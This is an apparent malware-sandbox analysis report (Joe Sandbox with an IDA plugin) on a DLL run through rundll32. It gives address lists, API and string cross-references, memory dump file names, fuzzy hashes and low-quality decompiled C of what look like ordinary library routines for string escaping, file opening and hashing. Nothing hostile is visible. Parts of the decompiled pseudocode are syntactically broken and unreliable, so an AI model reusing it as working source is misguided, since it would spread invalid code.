0x10009830
0x1000981e
0x10009812
0x10009761
0x10009761
0x10009764
0x10009766
0x1000976c
0x1000976e
0x10009771
0x10009774
0x100099e8
0x100099ea
0x00000000
0x100099f0
0x100099f0
0x100099f0
0x100099f2
0x100099f5
0x100099f8
0x10009a88
0x10009a88
0x10009a8b
0x10009a8d
0x00000000
0x10009a8d
0x100099fe
0x10009a01
0x00000000
0x10009b17
0x10009b1a
0x10009b1f
0x10009b23
0x10009b28
0x10009b2c
0x00000000
0x00000000
0x00000000
0x00000000
0x10009aa4
0x10009aa7
0x10009aac
0x10009ab0
0x10009ab5
0x10009ab9
0x00000000
0x00000000
0x10009af8
0x10009afb
0x10009b00
0x10009b04
0x10009b09
0x10009b0d
0x00000000
0x00000000
0x10009adc
0x10009adf
0x10009ae4
0x10009ae9
0x10009aed
0x10009af1
0x00000000
0x00000000
0x10009ac0
0x10009ac3
0x10009ac8
0x10009acd
0x10009ad1
0x10009ad5
0x00000000
0x00000000
0x10009a92
0x10009a92
0x10009a96
0x10009a97
0x10009a97
0x00000000
0x100099f0
0x10009a4d
0x00000000
0x10009a40
0x10009a40
0x10009a44
0x10009a45
0x10009a45
0x00000000
0x10009a4d
0x10009a4d
0x10009a4f
0x10009c10
0x10009c13
0x10009c18
0x10009c1d
0x10009c21
0x10009c25
0x10009a55
0x10009a55
0x10009a10
0x10009a12
0x10009c30
0x10009c33
0x10009c38
0x10009c3c
0x10009c41
0x10009c45
0x10009a18
0x10009a18
0x10009a1a
0x00000000
0x10009a20
0x10009a20
0x10009a23
0x10009a28
0x10009a2d
0x10009a31
0x10009a35
0x10009a35
0x10009a1a
0x10009a57
0x10009a57
0x10009a60
0x10009b90
0x10009b90
0x10009b93
0x10009b95
0x10009a66
0x10009a66
0x10009a69
0x10009a6e
0x10009a73
0x10009a77
0x10009a7b
0x10009a7b
0x10009a60
0x10009a55
0x00000000
0x1000977a
0x1000977a
0x1000977c
0x100098ff
0x100098ff
0x10009901
0x10009bd0
0x10009bd3
0x10009bd8
0x10009bdd
0x10009be1
0x10009be5
0x10009907
0x10009907
0x10009909
0x100098e0
0x100098e2
0x10009bb0
0x10009bb3
0x10009bb8
0x10009bbc
0x10009bc1
0x10009bc5
0x100098e8
0x100098e8
0x100098eb
0x100098ed
0x100098ed
0x1000990b
0x1000990b
0x1000990e
0x10009913
0x10009918
0x1000991c
0x10009920
0x10009920
0x10009909
0x100098f2
0x100098f6
0x100098f7
0x100098f7
0x10009782
0x100097cd
0x100097cd
0x100097cf
0x10009bf0
0x10009bf3
0x10009bf8
0x10009bfd
0x10009c01
0x10009c05
0x100097d5
0x100097d5
0x10009788
0x1000978a
0x10009c50
0x10009c53
0x10009c58
0x10009c5c
0x10009c61
0x10009c65
0x10009790
0x10009790
0x10009792
0x00000000
0x10009798
0x10009798
0x1000979b
0x100097a0
0x100097a4
0x100097a9
0x100097ad
0x100097ad
0x10009792
0x100097d7
0x100097d7
0x100097e0
0x10009b80
0x10009b80
0x10009b83
0x10009b85
0x100097e6
0x100097e6
0x100097e9
0x100097ee
0x100097f3
0x100097f7
0x100097fb
0x100097fb
0x100097e0
0x100097d5
0x00000000
0x100097c0
0x100097c0
0x100097c4
0x100097c5
0x100097c5
0x100097cd
0x1000977c
0x10009774
0x10009766
0x10009869
0x10009869
0x10009869
0x00000000

APIs

mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097AD
mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB
strchr.MSVCRT ref: 1000983B
mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 10009920
mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 10009C05

Strings

'\'', xrefs: 100098C3
", xrefs: 10009B1A, 10009C53
', xrefs: 10009A23, 10009AFB
<, xrefs: 10009ADF, 10009BD3, 10009BF3, 10009C13
>, xrefs: 100097E9, 1000990E, 10009A69, 10009AC3
&, xrefs: 1000979B, 10009AA7, 10009BB3, 10009C33

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprintf$strchr
String ID: &$'$>$<$"$'\''
API String ID: 2626076477-3929336650
Opcode ID: 4d3215f32d1e7072e86e6aa446e4fa65e4d3290bde3b119a889ed9f3e12215f6
Instruction ID: 4cad4ceb1349a5dbac3916fb8057f47bb241a6bf44f33620574422d9e36815b4
Opcode Fuzzy Hash: 4d3215f32d1e7072e86e6aa446e4fa65e4d3290bde3b119a889ed9f3e12215f6
Instruction Fuzzy Hash: 49D16D74908B91CBE710DF69808036EBBE1FB826C0F55885EE9D58B24ADB35D945CB83

Uniqueness

Uniqueness Score: -1.00%

Function 1002B459 Relevance: 47.4, APIs: 14, Strings: 13, Instructions: 143COMMON

Download Yara Rule

APIs

mv_log.F072 ref: 1002B54C
mv_log.F072 ref: 1002B595

Strings

FLT_MIN, xrefs: 1002B643
-FLT_MIN, xrefs: 1002B663
UINT32_MAX, xrefs: 1002B5E3
INT_MAX, xrefs: 1002B583
INT_MIN, xrefs: 1002B55B
FLT_MAX, xrefs: 1002B623
DBL_MIN, xrefs: 1002B6A1
I64_MAX, xrefs: 1002B5A3
-DBL_MAX, xrefs: 1002B6E5
DBL_MAX, xrefs: 1002B682
-DBL_MIN, xrefs: 1002B53A
I64_MIN, xrefs: 1002B5C3
-FLT_MAX, xrefs: 1002B603

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log
String ID: -DBL_MAX$-DBL_MIN$-FLT_MAX$-FLT_MIN$DBL_MAX$DBL_MIN$FLT_MAX$FLT_MIN$I64_MAX$I64_MIN$INT_MAX$INT_MIN$UINT32_MAX
API String ID: 2418673259-2628725902
Opcode ID: e90ee6d010d09c2d684cb04bb04c904a476461553175501e72a673df4a9af713
Instruction ID: 4c31bbb90f6fbee119ddbfb6ea13fba03270b1bb6a8ffc6e7e7138b8bf254e82
Opcode Fuzzy Hash: e90ee6d010d09c2d684cb04bb04c904a476461553175501e72a673df4a9af713
Instruction Fuzzy Hash: 3F513DB9908F548FC354EF25E49531EBAE0FF84380FD4C92D94C99B225E73989859B02

Uniqueness

Uniqueness Score: -1.00%

Function 100195E0 Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 230COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10019633
mv_calloc.F072 ref: 1001964E
MultiByteToWideChar.KERNEL32 ref: 10019685
mv_calloc.F072 ref: 100196D7
mv_freep.F072 ref: 10019713
wcslen.MSVCRT ref: 1001971F
_wsopen.MSVCRT ref: 1001974B
mv_freep.F072 ref: 10019758
_sopen.MSVCRT ref: 1001978A
_errno.MSVCRT ref: 100197F5
wcslen.MSVCRT ref: 1001981B
mv_calloc.F072 ref: 10019857
wcscpy.MSVCRT ref: 10019872
wcscat.MSVCRT ref: 10019882
mv_freep.F072 ref: 1001988A
_errno.MSVCRT ref: 100198E1
mv_freep.F072 ref: 100198F4
mv_calloc.F072 ref: 10019912
wcscpy.MSVCRT ref: 10019929
wcscat.MSVCRT ref: 1001993C
_errno.MSVCRT ref: 10019946
_errno.MSVCRT ref: 10019958

Strings

\\?\UNC\, xrefs: 10019920
\\?\, xrefs: 10019869

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _errnomv_callocmv_freep$ByteCharMultiWidewcscatwcscpywcslen$_sopen_wsopen
String ID: \\?\$\\?\UNC\
API String ID: 2585690843-3019864461
Opcode ID: 378f72ee278ce5d6c1fa6c04bbe2b06fef19544e86df13747ce3d1d992c4811e
Instruction ID: 3dc82464431d1485f9b1200b51e46201d74a27639f097cc6c66f11d6c06c393f
Opcode Fuzzy Hash: 378f72ee278ce5d6c1fa6c04bbe2b06fef19544e86df13747ce3d1d992c4811e
Instruction Fuzzy Hash: 9391D3B49093059FC350EF69848421EBBE0FF89794F51892EF8D8CB290E774D980DB82

Uniqueness

Uniqueness Score: -1.00%

Function 1001C790 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 231
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E1001C790(void* __ecx, void* __edx, void* __eflags) {
				void* _t1171;
				void* _t1172;
				void* _t1173;
				signed int _t1178;
				void* _t1184;
				void* _t1185;
				void* _t1189;
				void* _t1194;
				void* _t1197;
				void** _t1198;

				_t1171 = 0x100b5e05;
				_t1178 = 0;
				_t1198 = _t1197 - 0x1c;
				_t1194 = _t1198[0xc];
				_t1184 = _t1198[0xd];
				 *_t1194 = 0;
				while(1) {
					_t1198[1] = _t1171;
					 *_t1198 = _t1184;
					_t1172 = L10006B30();
					_t1189 = _t1172;
					if(_t1172 == 0) {
						break;
					}
					_t1178 = _t1178 + 1;
					if(_t1178 != 0xf) {
						_t1171 =  *(0x100b6000 + _t1178 * 8);
						continue;
					} else {
						return 0xffffffea;
					}
					L457:
				}
				 *_t1198 = 0x10;
				_t1173 = E10029100();
				_t1185 = _t1173;
				if(_t1173 == 0) {
					L18:
					_t1189 = 0xfffffff4;
					goto L11;
				} else {
					 *(_t1173 + 4) = _t1178;
					if(_t1178 > 0xd) {
						L10:
						 *_t1194 = _t1185;
						goto L11;
					} else {
						switch( *((intOrPtr*)(_t1178 * 4 +  &M100B5E0C))) {
							case 0:
								__eax = E10028790();
								goto L9;
							case 1:
								__eax = L10029FC0();
								goto L9;
							case 2:
								__eax = E1003C470();
								goto L9;
							case 3:
								__eax = E100411A0();
								goto L9;
							case 4:
								_t1175 = E1004C260();
								L9:
								 *_t1185 = _t1175;
								if(_t1175 == 0) {
									 *_t1198 = _t1185;
									L100290D0();
									goto L18;
								} else {
									goto L10;
								}
								L11:
								return _t1189;
								goto L457;
							case 5:
								 *(__edi + 8) = L1000FDB0(__ebx, 4);
								goto L10;
							case 6:
								__esp[8] = __eax;
								__esp =  &(__esp[7]);
								__eax = __esp[1];
								 *__eax = 0;
								 *(__eax + 4) = 0;
								 *((intOrPtr*)(__eax + 0x48)) = 0x10325476;
								 *((intOrPtr*)(__eax + 0x4c)) = 0x98badcfe;
								 *((intOrPtr*)(__eax + 0x50)) = 0xefcdab89;
								 *((intOrPtr*)(__eax + 0x54)) = 0x67452301;
								return __eax;
								goto L457;
							case 7:
								__esp[8] = __eax;
								__esp =  &(__esp[7]);
								__esp = __esp - 0xc;
								__esp[1] = __esi;
								__ecx = __esp[4];
								__esi = 0;
								 *__esp = __ebx;
								__ebx = 0x20;
								__esp[2] = __edi;
								__eax = 0x10 + __ecx;
								if((__cl & 0x00000001) != 0) {
									 *(0x10 + __ecx) = 0;
									__eax = __ecx + 0x11;
									__ebx = 0x1f;
								}
								if((__al & 0x00000002) != 0) {
									 *__eax = 0;
									__ebx = __ebx - 2;
									__eax = __eax + 2;
								}
								__edi = __ebx;
								__edx = 0;
								__edi = __ebx & 0xfffffff8;
								do {
									 *(__eax + __edx) = __esi;
									 *(__eax + __edx + 4) = __esi;
									__edx = 8 + __edx;
								} while (__edx < __edi);
								__eax = __eax + __edx;
								if((__bl & 0x00000004) != 0) {
									 *__eax = 0;
									__eax = __eax + 4;
									if((__bl & 0x00000002) == 0) {
										goto L145;
									} else {
										goto L148;
									}
								} else {
									if((__bl & 0x00000002) != 0) {
										L148:
										 *__eax = 0;
										__eax = __eax + 2;
										if((__bl & 0x00000001) != 0) {
											goto L147;
										}
									} else {
										L145:
										if((__bl & 0x00000001) != 0) {
											L147:
											 *__eax = 0;
										}
									}
								}
								__ebx =  *__esp;
								 *(8 + __ecx) = 0xdaddca55;
								__esi = __esp[1];
								 *(__ecx + 0xc) = 0x725acc55;
								__edi = __esp[2];
								 *__ecx = 0xdaddca55;
								 *(__ecx + 4) = 0x725acc55;
								__esp =  &(__esp[3]);
								return __eax;
								goto L457;
							case 8:
								__edx = 0x80;
								__esp[1] = 0x80;
								 *__esp = __eax;
								__eax = L100A7F8C();
								goto L20;
							case 9:
								__ecx = 0xa0;
								__esp[1] = 0xa0;
								 *__esp = __eax;
								__eax = L100A7F8C();
								goto L20;
							case 0xa:
								__edx = 0x100;
								__esp[1] = 0x100;
								 *__esp = __eax;
								__eax = L100A7F8C();
								goto L20;
							case 0xb:
								__ecx = 0x140;
								__esp[1] = 0x140;
								 *__esp = __eax;
								__eax = L100A7F8C();
								goto L20;
							case 0xc:
								__edx = 0xa0;
								__esp[1] = 0xa0;
								 *__esp = __eax;
								__eax = E100A80B4();
								goto L20;
							case 0xd:
								__ecx = 0xe0;
								__esp[1] = 0xe0;
								 *__esp = __eax;
								__eax = E100A80B4();
								goto L20;
							case 0xe:
								__edx = 0x100;
								__esp[1] = 0x100;
								 *__esp = __eax;
								__eax = E100A80B4();
								goto L20;
							case 0xf:
								__ecx = 0xe0;
								__esp[1] = 0xe0;
								 *__esp = __eax;
								__eax = E100A81B0();
								goto L20;
							case 0x10:
								__edx = 0x100;
								__esp[1] = 0x100;
								 *__esp = __eax;
								__eax = E100A81B0();
								goto L20;
							case 0x11:
								__ecx = 0x180;
								__esp[1] = 0x180;
								 *__esp = __eax;
								__eax = E100A81B0();
								goto L20;
							case 0x12:
								__edx = 0x200;
								__esp[1] = 0x200;
								 *__esp = __eax;
								__eax = E100A81B0();
								goto L20;
							case 0x13:
								 *(__eax + 0xc) = 0xffffffff;
								goto L20;
							case 0x14:
								 *(__eax + 0xc) = 1;
								L20:
								__esp =  &(__esp[7]);
								return __eax;
								goto L457;
							case 0x15:
								__esp[0xa] = __ecx;
								__esp[9] = __edx;
								__eax =  *__ebx;
								__ebx = __esp[6];
								__esp[8] = __eax;
								__esp =  &(__esp[7]);
								__esp = __esp - 0x24;
								__esp[5] = __ebx;
								__ebx = __esp[0xa];
								__esp[8] = __ebp;
								__ebp = __esp[0xc];
								__esp[6] = __esi;
								__esp[7] = __edi;
								__edi = 0;
								__eax =  *__ebx;
								__edx =  *(__ebx + 4);
								__ebp = __eax + __ebp;
								 *__ebx = __eax + __ebp;
								asm("adc edi, edx");
								__eax = __eax & 0x0000003f;
								 *(__ebx + 4) = 0;
								 *__esp = __eax;
								if(__eax != 0) {
									__edx = 0x40;
									__edi = __eax;
									__esi = __esp[0xb];
									__edi = __ebx + __eax + 8;
									__edx = 0x40 - __eax;
									__eax = 8 + __ebx;
									__esp[2] = 8 + __ebx;
									__edx =  >  ? __ebp : __edx;
									__esp[1] = 0x40;
									if(0x40 >= 4) {
										if((__edi & 0x00000001) != 0) {
											__eax =  *__esi & 0x000000ff;
											__edi = __edi + 1;
											 *(__edi - 1) = __al;
											__eax = __esp[0xb];
											__esi = __esp[0xb] + 1;
											_t232 = __edx - 1; // 0x3f
											__eax = _t232;
											__esp[1] = _t232;
										}
										if((__edi & 0x00000002) != 0) {
											__eax =  *__esi & 0x0000ffff;
											__edi = __edi + 2;
											__esi = __esi + 2;
											 *(__edi - 2) = __ax;
											__esp[1] = __esp[1] - 2;
										}
										__eax = __esp[1];
										if(__eax >= 4) {
											__esp[3] = __edx;
											__eax = __eax & 0xfffffffc;
											__ecx = 0;
											__edx = __eax;
											do {
												__eax =  *(__esi + __ecx);
												 *(__edi + __ecx) =  *(__esi + __ecx);
												__ecx = __ecx + 4;
											} while (__ecx < __edx);
											__edx = __esp[3];
											__edi = __edi + __ecx;
											__esi = __esi + __ecx;
										}
									}
									__ecx = 0;
									if((__esp[1] & 0x00000002) != 0) {
										__eax =  *__esi & 0x0000ffff;
										__ecx = 2;
										 *__edi = __ax;
									}
									if((__esp[1] & 0x00000001) != 0) {
										__eax =  *(__esi + __ecx) & 0x000000ff;
										 *(__edi + __ecx) = __al;
									}
									__eax =  *__esp;
									__eax =  *__esp + __edx;
									if(__eax > 0x3f) {
										__esp[0xb] = __esp[0xb] + __edx;
										__ebp = __ebp - __edx;
										__edx = __esp[2];
										__eax = __ebx + 0x48;
										__ecx = 1;
										 *__esp = __eax;
										__eax = E10028070(__eax, 1, __esp[2]);
										__eax =  *__esp;
										goto L100;
									}
								} else {
									__eax = __ebx + 0x48;
									L100:
									__edx = __esp[0xb];
									__ecx = __ebp;
									__ecx = __ebp >> 6;
									__eax = __ebp;
									__eax = __ebp & 0x0000003f;
									if(__eax != 0) {
										__edi = __esp[0xb];
										__ecx = 8 + __ebx;
										__esi = __esp[0xb] + __ebp;
										if(__eax >= 4) {
											if((__cl & 0x00000001) != 0) {
												__ecx =  *__esi & 0x000000ff;
												__eax = __eax - 1;
												__esi = __esi + 1;
												 *(8 + __ebx) = __cl;
												__ecx = __ebx + 9;
											}
											if((__cl & 0x00000002) != 0) {
												__edi =  *__esi & 0x0000ffff;
												__ecx = __ecx + 2;
												__esi = __esi + 2;
												__eax = __eax - 2;
												 *(__ecx - 2) = __di;
											}
											if(__eax >= 4) {
												__edi = __eax;
												__edx = 0;
												__edi = __eax & 0xfffffffc;
												do {
													__ebx =  *(__esi + __edx);
													 *(__ecx + __edx) =  *(__esi + __edx);
													__edx = __edx + 4;
												} while (__edx < __edi);
												__ecx = __ecx + __edx;
												__esi = __esi + __edx;
											}
										}
										__edx = 0;
										if((__al & 0x00000002) != 0) {
											__edi =  *__esi & 0x0000ffff;
											__edx = 2;
											 *__ecx = __di;
											if((__al & 0x00000001) != 0) {
												goto L105;
											}
										} else {
											if((__al & 0x00000001) != 0) {
												L105:
												__eax =  *(__esi + __edx) & 0x000000ff;
												 *(__ecx + __edx) = __al;
											}
										}
									}
								}
								__ebx = __esp[5];
								__esi = __esp[6];
								__edi = __esp[7];
								__ebp = __esp[8];
								__esp =  &(__esp[9]);
								return __eax;
								goto L457;
							case 0x16:
								__esp[0xa] = __ecx;
								__esp[9] = __edx;
								__eax =  *__ebx;
								__ebx = __esp[6];
								__esp[8] = __eax;
								__esp =  &(__esp[7]);
								_push(__ebp);
								_push(__edi);
								_push(__esi);
								_push(__ebx);
								__esp = __esp - 0x2c;
								__ecx = __esp[0x10];
								__edi = __esp[0x12];
								__ebx = __esp[0x11];
								__eax =  *__ecx;
								__edx =  *(__ecx + 4);
								 *__esp =  *__ecx;
								__eax =  *(8 + __ecx);
								__esp[1] =  *(__ecx + 4);
								__edx =  *(__ecx + 0xc);
								__esp[4] = __eax;
								__esp[5] =  *(__ecx + 0xc);
								if(__esp[0x12] == 0) {
									L193:
									__esp =  &(__esp[0xb]);
									_pop(__ebx);
									_pop(__esi);
									_pop(__edi);
									_pop(__ebp);
									return __eax;
								} else {
									__eax = __esp[0x12];
									__edx = 0;
									 *((intOrPtr*)(__ecx + 0x28)) =  *((intOrPtr*)(__ecx + 0x28)) + __esp[0x12];
									__eax =  *(__ecx + 0x20);
									asm("adc [ecx+0x2c], edx");
									if(__eax <= 0) {
										L188:
										__eax = __esp[0x12];
										__eax = __esp[0x12] & 0xfffffff0;
										__esp[9] = __eax;
										__eax = __eax + __ebx;
										__esp[6] = __eax;
										if(__ebx < __eax) {
											__esi =  *__esp;
											__ebp = __ebx;
											__esp[0x10] = __ecx;
											__edi = __esp[1];
											__esp[0x11] = __ebx;
											do {
												__eax =  *__ebp;
												__ebx = 0x114253d5;
												__ecx =  *(__ebp + 4) * 0x114253d5;
												__edx = __eax * 0x87c37b91;
												__ecx =  *(__ebp + 4) * 0x114253d5 + __eax * 0x87c37b91;
												__edx = __eax * 0x114253d5 >> 0x20;
												__eax = __eax * 0x114253d5;
												__ebx = 0x2745937f;
												__ecx = __edx;
												__edx = __eax;
												__edx = (__eax << 0x00000020 | __ecx) << 0x1f;
												__esp[2] = (__eax << 0x00000020 | __ecx) << 0x1f;
												__ecx = (__ecx << 0x00000020 | __eax) << 0x1f;
												__eax =  *(8 + __ebp);
												__esp[3] = __ecx;
												__ecx =  *(__ebp + 0xc) * 0x2745937f;
												__edx = __eax * 0x4cf5ad43;
												__ecx =  *(__ebp + 0xc) * 0x2745937f + __eax * 0x4cf5ad43;
												__edx = __eax * 0x2745937f >> 0x20;
												__eax = __eax * 0x2745937f;
												__edx = __edx + __ecx;
												__ecx = __eax;
												__ecx = (__edx << 0x00000020 | __eax) >> 0x1f;
												__ebx = __edx;
												__edx = __esp[3];
												 *__esp = __ecx;
												__ebx = (__eax << 0x00000020 | __ebx) >> 0x1f;
												__eax = __esp[2] * 0x4cf5ad43;
												__esp[1] = __ebx;
												__ebx = 5;
												__esp[3] * 0x2745937f = __esp[3] * 0x2745937f + __esp[2] * 0x4cf5ad43;
												__eax = 0x2745937f;
												__edx = 0x2745937f * __esp[2] >> 0x20;
												__eax = 0x2745937f * __esp[2];
												__edx = (0x2745937f * __esp[2] >> 0x20) + __esp[3] * 0x2745937f + __esp[2] * 0x4cf5ad43;
												__eax = 0x2745937f * __esp[2] ^ __esi;
												__edx = (0x2745937f * __esp[2] >> 0x00000020) + __esp[3] * 0x2745937f + __esp[2] * 0x4cf5ad43 ^ __edi;
												__ecx = __eax;
												__eax = (__eax << 0x00000020 | __edx) << 0x1b;
												__edx = (__edx << 0x00000020 | __ecx) << 0x1b;
												__eax = __eax + __esp[4];
												asm("adc edx, [esp+0x14]");
												__ecx = __edx + __edx * 4;
												__edx = __eax * 5 >> 0x20;
												__eax = __eax * 5;
												__edx = __edx + __ecx;
												__esi = __eax;
												__edi = __edx;
												__edx = __esp[1];
												__esi = __eax + 0x52dce729;
												asm("adc edi, 0x0");
												__eax =  *__esp * 0x87c37b91;
												__esp[1] * 0x114253d5 = __esp[1] * 0x114253d5 +  *__esp * 0x87c37b91;
												__eax = 0x114253d5;
												__edx = 0x114253d5 *  *__esp >> 0x20;
												__eax = 0x114253d5 *  *__esp;
												__edx = (0x114253d5 *  *__esp >> 0x20) + __esp[1] * 0x114253d5 +  *__esp * 0x87c37b91;
												__ecx = __esp[4];
												__eax = 0x114253d5 *  *__esp ^ __esp[4];
												__ecx = __esp[5];
												__edx = (0x114253d5 *  *__esp >> 0x00000020) + __esp[1] * 0x114253d5 +  *__esp * 0x87c37b91 ^ __esp[5];
												__ecx = __eax;
												__eax = (__eax << 0x00000020 | __edx) << 0x1f;
												__edx = (__edx << 0x00000020 | __ecx) << 0x1f;
												__eax = __eax + __esi;
												asm("adc edx, edi");
												__ecx = __edx + __edx * 4;
												__edx = __eax * 5 >> 0x20;
												__eax = __eax * 5;
												__edx = __edx + __ecx;
												__esp[4] = __eax;
												__eax = __esp[6];
												asm("adc edx, 0x0");
												__esp[5] = __edx;
												__ebp = 0x10 + __ebp;
											} while (__ebp < __esp[6]);
											__ebx = __esp[0x11];
											 *__esp = __esi;
											__eax = __esp[9];
											__esp[1] = __edi;
											__ecx = __esp[0x10];
											__ebx = __esp[0x11] + __esp[9];
										}
										__eax =  *__esp;
										__edx = __esp[1];
										 *__ecx =  *__esp;
										__eax = __esp[4];
										 *(__ecx + 4) = __esp[1];
										__edx = __esp[5];
										 *(8 + __ecx) = __esp[4];
										__eax = __esp[0x12];
										 *(__ecx + 0xc) = __esp[5];
										__eax = __esp[0x12] & 0x0000000f;
										if(__eax != 0) {
											__edi = __eax;
											__esi = 0x10 + __ecx;
											if(__eax >= 4) {
												if((__esi & 0x00000001) != 0) {
													__edx =  *__ebx & 0x000000ff;
													__esi = __ecx + 0x11;
													__ebx = __ebx + 1;
													__edi = __eax - 1;
													 *(0x10 + __ecx) = __dl;
												}
												if((__esi & 0x00000002) != 0) {
													__edx =  *__ebx & 0x0000ffff;
													__esi = __esi + 2;
													__ebx = __ebx + 2;
													__edi = __edi - 2;
													 *(__esi - 2) = __dx;
												}
												if(__edi >= 4) {
													 *__esp = __eax;
													__ebp = __edi;
													__edx = 0;
													__ebp = __edi & 0xfffffffc;
													do {
														__eax =  *(__ebx + __edx);
														 *(__esi + __edx) =  *(__ebx + __edx);
														__edx = __edx + 4;
													} while (__edx < __ebp);
													__eax =  *__esp;
													__esi = __esi + __edx;
													__ebx = __ebx + __edx;
												}
											}
											__edx = 0;
											if((__edi & 0x00000002) != 0) {
												__edx =  *__ebx & 0x0000ffff;
												 *__esi = __dx;
												__edx = 2;
											}
											if(__edi != 0) {
												__ebx =  *(__ebx + __edx) & 0x000000ff;
												 *(__esi + __edx) = __bl;
											}
											 *(__ecx + 0x20) = __eax;
											__esp =  &(__esp[0xb]);
											_pop(__ebx);
											_pop(__esi);
											_pop(__edi);
											_pop(__ebp);
											return __eax;
										} else {
											goto L193;
										}
									} else {
										if(__eax > 0xf) {
											L187:
											__eax =  *(0x10 + __ecx);
											__esi = 0x114253d5;
											__ebp =  *(__ecx + 0x14) * 0x114253d5;
											 *(__ecx + 0x20) = 0;
											__edx = __eax * 0x87c37b91;
											__edi =  *(__ecx + 0x14) * 0x114253d5 + __eax * 0x87c37b91;
											__edx = __eax * 0x114253d5 >> 0x20;
											__eax = __eax * 0x114253d5;
											__esi =  *(__ecx + 0x1c) * 0x2745937f;
											__edx = __edi + __edx;
											__edi = __eax;
											__edi = (__eax << 0x00000020 | __edx) << 0x1f;
											__ebp = __edx;
											__esp[6] = (__eax << 0x00000020 | __edx) << 0x1f;
											__ebp = (__edx << 0x00000020 | __eax) << 0x1f;
											__eax =  *(__ecx + 0x18);
											__esp[7] = __ebp;
											__edx = __eax * 0x4cf5ad43;
											__esi =  *(__ecx + 0x1c) * 0x2745937f + __eax * 0x4cf5ad43;
											__edx = 0x2745937f;
											__edx = __eax * 0x2745937f >> 0x20;
											__eax = __eax * 0x2745937f;
											__edx = __esi + __edx;
											__esi = __eax;
											__esi = (0x2745937f << 0x00000020 | __eax) >> 0x1f;
											__edi = __edx;
											__esp[2] = (0x2745937f << 0x00000020 | __eax) >> 0x1f;
											__edi = (__eax << 0x00000020 | __edx) >> 0x1f;
											__esi = __esp[6];
											__esp[3] = (__eax << 0x00000020 | __edx) >> 0x1f;
											__edi = __esp[7];
											__eax = __esi * 0x4cf5ad43;
											__edx = __esp[7] * 0x2745937f;
											__edi = __esp[1];
											__ebp = __esp[7] * 0x2745937f + __esi * 0x4cf5ad43;
											__eax = 0x2745937f;
											__edx = 0x2745937f * __esi >> 0x20;
											__eax = 0x2745937f * __esi;
											__esi =  *__esp;
											__edx = __edx + __ebp;
											__eax = __eax ^  *__esp;
											__edx = __edx ^ __esp[1];
											__esi = __eax;
											__edi = __esp[2];
											__eax = (__eax << 0x00000020 | __edx) << 0x1b;
											__ebp = 5;
											__edx = (__edx << 0x00000020 | __esi) << 0x1b;
											__eax = __eax + __esp[4];
											asm("adc edx, [esp+0x14]");
											__esi = __edx + __edx * 4;
											__edx = __eax * 5 >> 0x20;
											__eax = __eax * 5;
											__ebp = __esp[3];
											__edx = __esi + __edx;
											 *__esp = __eax;
											asm("adc edx, 0x0");
											__esp[1] = __edx;
											__eax = __edi * 0x87c37b91;
											__edx = __esp[3] * 0x114253d5;
											__ebp = __esp[4];
											__esi = __esp[3] * 0x114253d5 + __edi * 0x87c37b91;
											__eax = __edi;
											__edi = 0x114253d5;
